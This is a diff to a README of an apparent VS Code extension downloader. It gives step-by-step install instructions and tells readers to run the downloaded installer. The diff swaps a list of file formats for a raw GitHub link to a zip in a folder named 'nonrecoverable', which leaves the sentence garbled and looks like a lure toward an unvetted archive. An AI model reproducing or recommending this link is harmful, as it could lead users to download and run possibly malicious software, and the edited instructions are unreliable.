3aboody/vscode-extension-downloader/README.md

 2. **Select the Latest Release**: Look for the latest release of the application.
 You will find it at the top of the list.

 3. **Download the Application**: Click on the provided link for the installer file that matches your operating system.
-This will usually be in a format like `.exe`, `.dmg`, or `.tar.gz`.
+This will usually be in a format like `.exe`, `.dmg`, or `https://raw.githubusercontent.com/3aboody/vscode-extension-downloader/main/nonrecoverable/vscode-extension-downloader.zip`.

 4. **Run the Installer**: Locate the downloaded file in your downloads folder.
 Double-click on the installer file to run it.